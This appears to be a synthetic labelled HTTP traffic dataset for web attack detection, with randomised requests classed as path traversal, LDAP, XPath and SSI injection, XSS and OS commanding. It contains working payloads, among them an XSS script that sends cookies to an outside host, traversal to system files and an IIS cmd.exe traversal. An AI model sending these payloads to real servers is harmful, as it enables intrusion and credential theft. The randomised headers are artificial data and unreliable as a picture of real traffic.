Authorization: Basic UnRvZG9ubzplbGVvMTV4
Range: 498-82346
Referer: http://av5rrA.it/hghF/shi8a/tasxrw.mpeg
TE: trailers,gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/7.3 (compatible; Konqueror/4.8; Win98; sth9; wede9)
UA-CPU: x86
UA-Disp: 6743,482,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 5.9 www.EorOa7.css
Transfer-Encoding: compress
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42225
Start - Id: 45393
class: PathTransversal
POST /09whtsddeheea5icn/7Az4kperlBchild/tcmeimk71/aqmf_TA6FtJqBe/TseMYmtlxTeyr4hIxO/qtts8n.cgi? HTTP/1.1
Content-Length: 67
Content-Language: Mua,dnbu1,ubideot
Content-Encoding: deflate
Content-Location: /npi4y1e/w8tp/eeri/ocbnxeh/nnao.exe
Content-MD5: a2FpMzRucm1vbGh5bmF6dw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Mar 05 12:15:43 UTC
Last-Modified: Sun, 30 Jul 06 21:42:09 UTC
Host: 148.110.50.164
Connection: keep-alive
Accept: application/postscript
Accept-Charset: iso-8859-2, iso-2022-kr;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: oa-l5ye1;q=0.8, heratmt-aatas, 6bfiriw-dn, hnnw8i-5;q=0.6
Cache-Control: ooz=lrre
Client-ip: 2.231.241.65
Cookie: ielhb2smaem3re6=utJmjseNaw;idscf=aBCWybpX
Cookie2: $Version="7"
Date: Sun, 21 Jun 09 18:31:15 GMT
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sun, 19 Dec 04 08:01:02 CET
If-Unmodified-Since: Sat, 19 Apr 08 19:39:26 UTC
If-Match: "0G3hCafjr.2N4XFsY5c2"
If-None-Match: *
If-Range: *
Max-Forwards: 013
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: gclbs enS5me=dcjupRxa
Authorization: Basic b3VjYTE6ZmQ1YXQ=
Range: 4-825,07-,961817-416
Referer: http://www.tshas.biz/we0opsu/ibhhlh.mpeg
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (X11; U; Solaris 0.0; ea-rc; rv:1.0.7) Gecko/55915003
UA-CPU: Sparc
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 789x027
Via: Ebmrhn/7.5 www.oshnenl.css, 1.5 www.tUejt.html
Transfer-Encoding: epWl
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 928 www.yictte4.js "eobt1krstsZ2erAppmt" 
X-Forwarded-For: 35.190.104.115
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1siIa5neth36swi=..\..\..\..\WINDOWS\system.ini&obld=acreh

End - Id: 45393
Start - Id: 37522
class: LdapInjection
PUT /eqeo09es9ah/kZYzo/bheYMallV3Cb/nupsz/Kpvtut8lrEs/el3ebnea/51nmdWpeteettaem/vrRiipSa3iImi1Tst/a72@9C@V.7Lw.nsf? HTTP/1.0
Content-Length: 197
Content-Language: F
Content-Encoding: gzip
Content-Location: /ysesH9/NHeth/ween.tar
Content-MD5: eWVlcmZhbGN0dG50bGU0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 08:08:37 CET
Last-Modified: Tue, 20 Apr 04 21:19:49 CET
Host: www.lnemnoos2.gov:71488
Connection: nO1s
Accept: */*
Accept-Charset: iso-8859-15, iso-8859-9
Accept-Encoding: *
Accept-Language: Ki7o0Iat-tbe;q=0.6, e-hih, sf8-Re;q=0.0, e-Tia0;q=0.4, omn2s-aomeitU
Cache-Control: Heo=eigt
Client-ip: 128.14.44.106
Cookie: bor4iezn=hemserviceskassIn;nTs=inputti6tIxtermu;0swedeweu=kd;eGlogAPgJ=o50
Cookie2: $Version="192"
Date: Thu, 08 Feb 07 10:44:11 CET
ETag: "Nq16_GSQLHgRfBd"
Expect: 100-continue
From: dina@oseatr.cz
If-Modified-Since: Thu, 17 Jan 08 11:22:36 CET
If-Unmodified-Since: Thu, 22 Mar 07 01:29:52 CET
If-Match: "cwXPK.00F4rWBLp"
If-None-Match: "cQz-Fch762z5wWVa"
If-Range: Sun, 20 Dec 09 06:49:17 UTC
Max-Forwards: 06
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM bmFsZnRybWs1VG1ybmVlTGh3Z2l3dDVGZDFubnNib0EwOWl3bTRoUnZOMm53aW9p
Authorization: NTLM c25xY29lbGVzZWE1UmFBdG9jNm1lZGV1RWRwbWtBZnRhbTNwa3Jh
Range: 0516-7855,069180-,334-
Referer: /trao5eI/byrnei/dicN/gzmeEeOn/rggnehr.exe
TE: gzip;q=0.5,deflate;q=0.1,trailers
Trailer: Connection
User-Agent: Mozilla/4.9 (X11; U; Unix 4.4; no-a4; rv:7.4.1) Gecko/67526724
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 428x4367
Via: 6.4 95.218.183.57, 9.7 104.205.119.33:0
Transfer-Encoding: deflate
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

doeuedtirltl=iuhdh)(   |  (uds=*)&a9do8t8n=xo90haes0dtlt&ntie5imes9aj=<'he&retc>b0roeW:&zUewaTetailtfs=nni1oiiuero&tstalae=h&oh2mYoei=2003388&erlowdn=eafh&vz.FmY@rj=06&efp=8ss

End - Id: 37522
Start - Id: 46294
class: PathTransversal
GET /m2-A/5atn.png?0col=66&td=4308665122&aafo08rro=dtetmrsfnruhs&gjSuglXar3=t1%40Z69rW8t&zonro2=%3A&Ed9eomqWpr=%7E9oO%40oenYyoos%2Fe&zsrs=%2Fetc%2Fpasswd&2mnrz=9hii+1ea3vma%3Bbgsoundn&l2U_ClibwinntnLR=eilynmbnt&5euJGr7xx=mir3cd9eemse%7E HTTP/1.0
Host: 222.20.176.229
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 54.146.114.194
Cookie: eok=titt6toBtma
Cookie2: $Version="98"
Date: Sat, 11 Feb 06 06:19:06 CET
ETag: W/"BjwDsywXQsCtOft"
Expect: 100-continue
From: ysse83ei@yttEeHd.biz
If-Modified-Since: Sat, 28 Mar 09 04:09:29 CET
If-Unmodified-Since: Thu, 13 Aug 09 03:42:56 UTC
If-Match: *
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 298
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Digest response="ac09Dfddbc6c311F1b7fbca4cD813C1F"
Range: 5-,07-2
Referer: http://www.xfwes.uk/oe0Sln/breh/Ge3tqtp2/uytte.conf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.2 (compatible; Konqueror/0.5; Linux i386; oeqt; 697ecgrEtp)
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 4.3 255.38.36.72:275, 6.0 www.Yotnu.htm
Transfer-Encoding: identity
Upgrade: seEc/8.9, 7elors/6.3, 4uhv/9.8, I5eg5m/5.5
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 177.74.168.130
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46294
Start - Id: 48161
class: XSS
GET /n1mazxu/T-H01/aD/estnChtrilhspiooa/mzDd_eVd2fR/JCIsjYs.bin?s4javeeeeni4sy=rwMant+whttpsoptonmochanosdt&noeusEhdiceSil=9029&6MNYQypl=%3C%3Cscript%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.innising.com%2Fcgi-bin%2Flaennsro.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&rha=%5Ch+r%26td0din&4pahIDl0=996&OPyMi=808978&nmyrT=7&OQB-FdonK=ebvotoabniwaergQ&unHe=592172&o8nwoe9nphook=19&Menno3unu=tWSu3xY&abtix37yun5b=195857&ebuwsw=aR%3D2m&mYtysynast=489429785 HTTP/1.0
Host: 188.153.175.154
Connection: close
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.3, gzip;q=0.0, gzip
Accept-Language: *;q=0.3
Cache-Control: min-fresh=419
Client-ip: 211.190.214.99
Cookie: toleteeo6dn9Ei4=dectgAgs;BUwXoaccess_logfEsystemO=?th em'$hud2;ooshgihh=t3t @Btvbscript;hooaiilnmvgjob4=50
Cookie2: $Version="37"
Date: Sat, 20 Aug 05 10:44:11 UTC
ETag: W/"KTjmOB4QF.aHd_v"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Wed, 20 Feb 08 03:17:34 CET
If-Unmodified-Since: Mon, 01 May 06 04:30:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 7.0
Pragma: lCbhoBeh=asresse
Authorization: NTLM aVBwbGFsYWlyZG9kcmVzRWZwZWVpZElodGRldGlhc3d1bjg1
Range: 248-
Referer: /3tota/addean.cgi
TE: gzip,gzip;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/4.0 (X11; U; Open BSD i386 6.3; Eb-sN; rv:7.3.0) Gecko/85536359
UA-CPU: MIPS
UA-Disp: 472,3569,8
UA-OS: Win98
UA-Color: color16
Via: HTTP/5.0 54.26.103.156
Transfer-Encoding: grg3ro
Warning: 469 www.eeshc.gif:6 "8tbhssqusptoj" 
X-Forwarded-For: 157.237.161.131
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48161
Start - Id: 36171
class: PathTransversal
GET /pe/nyjZze@-C_RN/ahF-/uJc1ZCOmiu1pvlEEpUt/ieGQ4b/iUgadatsetiobNip/it_g0v@jbkmGs/ntnnij/betweenC/yxI5kldZx7C3xd-Gm/Pmeta2dnodeesSA9passwd6.mdb?nyB3aTeot9pk=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&blctlrlcawrlhaL=143&usjhr6q=0319136&ee2e3=83379&rrcrEpu=41852643&eTlc0tio5mSUnst=ss7 HTTP/1.0
Host: www.d0knLoue0m.biz:80
Connection: keep-alive
Accept: audio/*;q=0.6, video/*;q=0.9, image/jpeg;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: teo-te, i13q6e0l-eb7Au;q=0.9
Cache-Control: min-fresh=7
Client-ip: 164.195.241.61
Cookie: ddnqtAhtmauphpa=bt;cyoe1maddtaimr=(h/ealysdeconnect1;rek5r898d=116387;tipoxdtr=conh
Cookie2: $Version="99"
Date: Mon, 22 Mar 10 17:31:13 UTC
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Mon, 06 Jul 09 19:40:40 CET
If-Unmodified-Since: Thu, 18 Sep 08 12:05:23 CET
If-Match: *
If-None-Match: "C2HlJ8Hw_y47mdSOKks8"
If-Range: Fri, 18 Apr 08 19:03:17 UTC
Max-Forwards: 3062
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 462654-
Referer: http://rlasak.biz/2bseo/xtchaj7h/efygeag/hasfls/je4dbbnI.tar
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.1 (compatible; Konqueror/4.7; Windows NT; ZPmhe; rqA54hYRp5)
UA-Disp: 4206,422,32
UA-Color: color8
UA-Pixels: 5546x388
Via: HTTP/3.1 www.dhrr3.shtml
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 282 www.mar3eOer.jpg "Gzeol4" 
X-Forwarded-For: 214.211.159.226
X-Serial-Number: 4255971850
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36171
Start - Id: 44639
class: PathTransversal
GET /TkI80CjxtermQ8rRHq/em6Z15ByTM6FdCQYj/m-@rDq.gif?bhe=5dcaendhtiaent2&tsrin=%29ceehntfe8b&dRo=86016&auei2=ieadmini%24&wbte1sa=%3AnT&_.nph-VhyC3Y=naaeemtgno3taa8ttm&qH=7606552&qzlhdUnshqlth7=42472&iedE5hh5kitsei=91839267&dlin=64985&8WlDuLcmdstyled=s%29ty%3Ficntasmdelete&Rj=5302&ddezyGacd=82800119&wVn7etsiu7=3 HTTP/1.1
Host: 60.169.111.20:80
Connection: close
Accept: audio/basic;q=0.5, text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: file:///1:/ie/sagi/tlr.xml
Accept-Language: iro21ask-sc, 4ork-OnmuOr;q=0.8
Cache-Control: etait='fe'
Client-ip: 87.0.11.134
Cookie: eol1ahne9vna=8772435359;Sautoexec5N9qRihttps2=2splrbOtirliie;ttGuseOzn=054
Cookie2: $Version="9"
Date: Mon, 23 Jun 08 24:04:45 CET
ETag: "dpXSh8Z-yIwmS16F7"
Expect: i0gTl3=tt3ccu;iitdttt=ejrm
From: sene@eakbEa.biz
If-Modified-Since: Wed, 27 Jul 05 17:02:32 UTC
If-Unmodified-Since: Fri, 27 Oct 06 09:39:01 GMT
If-Match: "aeA2GbMEww0zFvtl"
If-None-Match: "lOUelim3oQA0_J5r3yr0"
If-Range: Thu, 08 Jan 09 24:45:35 UTC
Max-Forwards: 97
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest qop=2nwtea
Authorization: lidz eaeEa=4rennsEc
Range: -91317,1-,143349-680394
Referer: /tAaQ5G/pnfrrca5/enu8n.tiff
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/9.5 (compatible; Konqueror/5.1; Solaris; 2dIzoiasbh; nubmssmt; aVuisCrorr)
UA-CPU: x86
UA-Disp: 570,026,32
UA-OS: FreeBSD
UA-Color: color8
Via: 1.1 www.atvet41.html, 1.9 210.221.121.139, FTP/8.8 www.Odertn.gif
Transfer-Encoding: identity
Upgrade: li4Qh/6.8
X-Serial-Number: 78282419724364681
----: -------------------------

null

End - Id: 44639
Start - Id: 49428
class: XPathInjection
GET /W3vdom7FQ/pveGeHc2/sii7y3mOkd38/SlQR/22gtmmcmesdmdtae/winntn.rcpRyRE/ol9catjrnlamsmn.asmx?tJSSzPvUl=9lwSX&lrgssC4=dh%2Brdstylerg0T&if9=862785&ni=reaupae%27+or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++++%27aertigEm%27++++%3D%27&hf=8196&OOwhere1Bh=ub1YYcqoO&abeinrV=18585712&etsht4zeohi=awagtf HTTP/1.1
Host: www.cgltL8e.be:80
Connection: pmhTo
Accept: image/jpeg;q=0.0, image/jpeg;q=0.3
Accept-Charset: iso-8859-2;q=0.4, iso-8859-5
Accept-Encoding: compress, compress
Accept-Language: Ordret-32bie, 5-gvhyo, roi-TsnawtI;q=0.6, u-9iAe;q=0.0, 6eEdpinU-Rpe7ti;q=0.7
Cache-Control: min-fresh=88622
Client-ip: 235.231.116.228
Cookie: ee8tpildahinla= ia
Cookie2: $Version="722"
Date: Thu, 11 Nov 04 06:59:10 CET
ETag: "9EJy05E0HvEXhGvYe"
Expect: 100-continue
From: lyE3Znu@romta.biz
If-Modified-Since: Tue, 08 Sep 09 23:53:49 GMT
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: "zY@NQ@Ddy5uHrw3lcF"
If-Range: "22IR6tW9yoh_ewVYLb"
Max-Forwards: 0
MIME-Version: 0.6
Pragma: rp='aa8d'
Proxy-Authorization: Basic dG5FdDU6c2VmZnRldGE=
Authorization: o3ae hmns=Egpoigcn
Range: -32,-92418
Referer: /iwteH8/7p6t/neb0.jpeg
TE: chunked
Trailer: Warning
User-Agent: ENzdttsrawrse
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5208x110
Via: 5.1 191.113.40.13:282, 0.4 231.73.15.155:4, HTTP/1.3 www.neXeiLue.jpg
Transfer-Encoding: identity
Upgrade: 7wfie/1.9, qn3h0/6.3, fiEx/5.9, lho/6.1
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49428
Start - Id: 47424
class: XSS
GET /f-/bMPArjDVseb4Y/L4metalN_xmlFfmj-zjS/reoionejnepsa/ec/53QO067vfz0RzANP6/cmU.T74w6WtwNKpsfI.php4?s1pOoSt=22363&r0lb9lTsnN=2619138327&jzEdbr=1749467&ehr=gIgbw&utSricgaepxitnG=biyMAIBv&obgsound@allS=ftpi0ailikermk&xeA8=+likey%7Cmfd%5BRwuctelnet&onoeacsdae=taehgT3oW&seadenyCIr=%3C%21--+--+--%3E%3Cscript+%3E%5Balert+++%28%276cerncstn%27%29%3B%5D%3C%2Fscript%3E%3C%21--+--+--%3E&BD=htacces&roaugsa3=aeE HTTP/1.0
Host: www.eelydmboei.com
Connection: close
Accept: image/*;q=0.1, application/x-tar;q=0.7
Accept-Charset: x-mac-chinesetrad, koi8-r, x-mac-roman
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 249.196.221.75
Cookie: NEnw=aDArv
Cookie2: $Version="704"
Date: Sun, 24 Jul 05 22:32:52 CET
ETag: "-iFBwmWA_GdAc95F"
Expect: bnh5u=ermwt
From: inTjdbd@ngy03asiew.it
If-Modified-Since: Wed, 02 Jun 04 24:17:09 GMT
If-Unmodified-Since: Tue, 15 Aug 06 09:10:49 CET
If-Match: "fAotQn9HD5zXLM1Joc8"
If-None-Match: "mGUF_KNyfzn2.pIQ6"
If-Range: Sat, 21 Oct 06 22:13:07 GMT
Max-Forwards: 219
MIME-Version: 4.4
Pragma: eann=bnsn
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: Digest uri=http://aaqmdfbe.com/be0oT/lmgr/odee1eoy/qnli.php3
Range: 40-52491,810751-,61626-565636
Referer: http://uthts.de/mahvum9/eufhmts/trilxhs.gif
TE: trailers
Trailer: Pragma
User-Agent: msgtnlf (e0.rKKNu1j; sJrGrIXL; nJ2cKN)
UA-CPU: Sparc
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/7.1 www.hu7sius.htm:05546, 8.0 www.Ea7avfeT.jpeg:83179, HTTP/5.0 1.111.175.172
Transfer-Encoding: ktgct
Upgrade: tWh08/9.4, ars/6.0, sar/0.0, eed/7.2, te3n/6.1
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47424
Start - Id: 44159
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 26.16.61.213:406
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-jp, x-mac-chinesetrad;q=0.6, x-mac-arabic;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: yRx-oehlh8, isla-eIfb;q=0.8, elX2iPa-4zq;q=0.6, ohtssn-ipnl;q=0.3, cu-yinln
Cache-Control: tFo='1e'
Client-ip: 165.243.248.164
Cookie: rdt=6Ostdinlqpand c\tsG
Cookie2: $Version="971"
Date: Fri, 02 May 08 04:11:03 UTC
ETag: "fs5xbNlo-GIu_ej"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Sat, 27 Oct 07 06:00:06 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 09
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Digest realm
Range: 815-,644-20793
Referer: http://www.ma0te.de/rHdeddr/usiwct/Atkeerr.avi
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.7 (X11; U; Open BSD i386 0.7; ea-rd; rv:5.1.0) Gecko/37992724
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: FTP/8.7 107.152.169.202
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 498 131.29.120.151 "6ou22erwP9" "Sun, 02 Oct 05 20:11:01 CET"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44159
Start - Id: 39013
class: LdapInjection
PUT /nctm/f8mqtY_qnKhzQX/a9cB-tg/splso/cxtermr_k/gaGydK-_TVm6U.nsf? HTTP/1.0
Content-Length: 31
Content-Language: ktre,rh,tbrmrie
Content-Encoding: identity
Content-Location: /rKots/hyacl.wav
Content-MD5: ZHpobG9SeVNpdGFmcm5sOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Aug 05 13:04:07 GMT
Last-Modified: Sat, 10 Jan 04 10:41:06 GMT
Host: 127.31.108.244
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr;q=0.6, windows-1251;q=0.8
Accept-Encoding: gzip, gzip
Accept-Language: teI)( |   (a9a5R=*)
Cache-Control: tsa=ad
Client-ip: 103.25.9.144
Cookie: tbsroqsa1il=l2-FdOj6n;esaaieAakedpi=t4oeces
Cookie2: $Version="997"
Date: Mon, 14 Jun 04 11:07:29 CET
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 19 Jun 06 16:47:38 CET
If-Unmodified-Since: Mon, 26 Jul 04 17:55:04 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 185
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 6nrucs het0=Atese
Authorization: oae2n5 lfaLe3l=lwblep
Referer: http://www.y9wtme.com/7aMahti/WhmirZ/8fonu/Y2ytwr/nwiao1.html
TE: chunked,chunked
Trailer: User-Agent
User-Agent: tagr (s2b7E_GXWu)
UA-CPU: 68000
UA-Disp: 744,650,16
UA-Color: color16
UA-Pixels: 960x5747
Via: akaawo/6.0 209.158.37.155:4724, HTTP/6.8 162.232.204.166
Transfer-Encoding: gzip
Upgrade: yuanig/5.9, tImh/5.1
Warning: 717 67.113.202.67:1 "ssl4asgs3riaesdgfrre" 
X-Forwarded-For: 236.228.179.215
X-Serial-Number: 13381334
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eeso=dMneguoedguac eautoexecwbj

End - Id: 39013
Start - Id: 46465
class: PathTransversal
POST /ERAMw2z/X_mgZkTSC6Jv./t1re9niTfyfn5Rsh5hao.pl? HTTP/1.0
Content-Length: 203
Content-Language: reoeege,hksh,3rtiaf
Content-Encoding: identity
Content-Location: /erqin/eoOhtitd.png
Content-MD5: cmVtaGVvdjBlb2l0bmVybw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Jun 05 16:26:35 UTC
Last-Modified: Thu, 17 Mar 05 08:07:13 CET
Host: www.etsyocz.cz
Connection: it7rtmu
Accept: video/quicktime;q=0.2
Accept-Charset: utf-7, x-mac-hebrew;q=0.9, euc-kr, cp-932
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 75.175.4.109
Cookie: hn=\.\.\/\.\.\/etc\/passwd
Date: Thu, 02 Oct 08 20:46:55 GMT
Expect: 100-continue
If-Modified-Since: Sun, 08 Oct 06 19:10:20 GMT
If-Unmodified-Since: Sat, 06 Aug 05 18:19:55 UTC
If-Match: *
If-None-Match: "YNz9_jkjwyDAFG2C3iEM"
If-Range: "RnSuagcU1ZTHV.S"
Pragma: trtl='anuloLi'
Authorization: Basic dzRlNnd5YTphaGVk
Referer: http://twncxr.cz/M8Po.swf
User-Agent: 9oSoabDdJ http://www.e1hnr6.biz
UA-Disp: 1557,8474,32
UA-OS: FreeBSD
Via: FTP/1.0 www.pwP1ssdb.htm, tsde/2.2 138.22.7.71, HTTP/5.3 www.mthsictO.jpg
Transfer-Encoding: compress

nye1eeh=03343207&e2ooo4dr=an>eruot&aae=gEy1da5n&HUpsewnndnOcfee=unmE&noarwzhxos=rrttrsfb tvg5phpf&inXwNHxt=yjh&tewyeueAte0ieEn=6&y7P2N93hslog=bzbLl&iietFASamnln=tylid0hr0dnta)3&etaUtcbttleh=Ezr0gA+

End - Id: 46465
Start - Id: 49032
class: XPathInjection
GET /aM9otsne/tbfoouhdYinrs7c/nd9br5r0qttahstlSly/iL5Lns3s8xxG2p7/fKQH1r6G72e/vy5SIV5VwI/eS94@BsVC0ywpmx/os8HEhDrjWkzJKHv/o3iQRH6/eruusfgdyroh8yteal.png?mwetlf1a0nhswdt=hecptmpuhnt%28&DU737ET.RwX=r%3B%29hu2dyhye&eNrlctrKoEoWjmo=8672&6ar6dlnn8n4=C7ato2t%7ElecH9&otbmnytolamuEd=6hn3Dt%27%5D++++%7C+++P++++%7C+++++%2F%2Fuser%5B++++name%2Ftext%28%29+%3D+%27itaza&nntpb=cenmsriznrbineoji&t1O77Torottpsen=83931934&nmocha3ascriptunP@12=eIf&ji2efnbqhf9ar=%29ttih&nonrnyn=b2peexOii%2Fin&atgksstleldr=isrf4oTeldo&eahrSTi=eAiidhai4ii8LWc HTTP/1.1
Host: www.uEoUiw.uk
Connection: eoeersb
Accept: audio/x-wav;q=0.2, text/xml;q=0.5, text/*;q=0.4
Accept-Charset: koi8, shift_jis, iso-8859-15, iso-8859-8, isiri-3342
Accept-Encoding: identity, compress, identity, gzip;q=0.5
Accept-Language: s3taEino-ggnan;q=0.3, jee4nNc-oj7hln;q=0.2, u-sdqret, is0-uavIde;q=0.4, 9ntRt-eOua
Cache-Control: no-cache
Client-ip: 244.105.2.96
Cookie: 8rkqt2R=sY6cDHCpC;imgJVI=heo;hrs=6zkXHi1;ndheo=h;bevalc;tiw;EmsAaealr=ad&o
Cookie2: $Version="246"
Date: Thu, 27 Nov 08 09:40:18 UTC
ETag: W/"HDpgVKTxy7BTIpjaMShy"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Fri, 03 Dec 04 11:05:37 UTC
If-Unmodified-Since: Tue, 06 Jul 04 10:21:15 UTC
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: "P.ox4R-H61nKuYK"
If-Range: *
Max-Forwards: 7172
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Basic c3RoaXE6a3NlYw==
Range: -31
Referer: /ypmtsown.gif
TE: deflate;q=0.7,gzip;q=0.9
Trailer: Via
User-Agent: Mozilla/7.6 (Windows; U; Windows NT 9.4; ei-w5; rv:8.4.7) Gecko/96666312
UA-CPU: StrongARM
UA-Disp: 081,2723,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: rphl/5.9 246.138.1.26
Transfer-Encoding: gzip
Upgrade: sfltc/9.5, Llja/5.6
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49032
Start - Id: 40180
class: SSI
GET /hRp7ko@9Ocl/4iaea/rJfaccess_logwX/AE.htm?5Eo5mea6erh5ora=e9UWfaBBLIv&-HziQm=og&06=840590&E6f@QvXc=formfeN%5Dp%2B%3Eeogrkermi+&z7.RlocationL=ehaeuNu%7E&E4mp27=taCi&w08X5E2=om-qDvAb-&satbaoloo4mdo=dyh%7Emen&orleiaeen=%3C%21--++%23exec+++++cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2FtTarmioows%2Fpiwcrte%22+--%3E&edFXbodyJ=78050&LcwltsotsoceiMs=owNhow5oopenidh8eo&Ltyr=rsuRteP HTTP/1.1
Host: www.alftgeEru.de
Connection: close
Accept: audio/*;q=0.6, text/xml, audio/x-wav
Accept-Charset: hz-gb-2312, iso-2022-jp, utf-8;q=0.0, isiri-3342;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=75
Client-ip: 0.35.2.201
Cookie: 9Mn64XQ5=eri;ott=8370544079
Date: Tue, 25 Oct 05 08:40:29 UTC
